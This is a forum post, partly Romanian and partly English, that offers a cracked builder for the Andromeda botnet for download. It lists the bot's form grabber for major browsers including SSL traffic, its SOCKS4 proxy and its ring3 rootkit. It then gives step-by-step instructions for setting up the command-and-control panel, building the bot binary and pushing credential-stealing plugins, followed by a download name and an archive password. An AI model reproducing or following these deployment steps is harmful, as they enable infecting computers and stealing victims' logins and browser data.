Acest botnet este vandut pe forumuri rusesti pentru 1.5k.
1. Stabilitate incredibila, facut in asm.
2. Marime server: 13 kb (necompresat)
3. Nu foloseste dll uri pentru injectare/form grabber.
4. Form grabber: internet explorer, google chrome, firefox si opera (toate versiunile, prinde si ssl)
5. Socks4
6. Ring3 rootkit
Hi, first let me clear something off
As people didn't like the idea of being private, i was having intend by doing so it was meant for a test first i was going to public it some more days but seems like people are not patient.
as you can see some people tried to piss me off to let me release it, i don't really give a damn care about the new version i was just trying to let them have a calm and understand the situation, because i already decided before to not work on Andromeda again
sure RE is all about challenges but my challenge is not Andromeda again, all in all Andromeda is a nasty bot i don't like it, it costs more time than other bots because it is not a simple text to change so you have to know what you are doing otherwise you will stuck.
People just don't understand, it is not a simple task, i had to write nearly 600 lines of code to get this done so it is not easy as it may seem to be.
I never say something i am not sure of, if i was not have the knowledge to do it then i would not say i can do it.
Anyway here is my builder hope you enjoy it.

How to set up it:
1. Upload /Panel files to androhost.com/andro
2. Create one mysql db.
3. Upload f.pack, r.pack and s.pack from /Plugins folder in: androhost.com/andro directory.
4. chmod 777 androhost.com/andro/config.php, chmod 777 androhost.com/andro/fp_logs directory
5. Open in your browser androhost.com/andro/index.php?act=install.
6. Login with default creditials: admin:admin
7. Paste rc4 key to andromeda installation page: d40e75961383124949436f37f45a8cb6
8. Fill up all instalation page with your admin user and pasw, plus mysql details >> click 'Install'
9. After installation is done open in your browser androhost.com/andro/ifg.php
10. Delete androhost.com/andro/ifg.php and androhost.com/andro/GeoIPCountryWhois.csv.gz
11. Open Builder.exe > change host to: http://androhost.com/andro/image.php and build your bin.
12. For enable plugins just go in panel > menu > tasks > add task
Task type = Install plugin
Url= http://androhost.com/andro/r.pack
Click 'Enabled' and add your task, do the same for each plugin.
Enjoy it

Download: Andromeda v2.06.rar
Pass: TrojanForge.co
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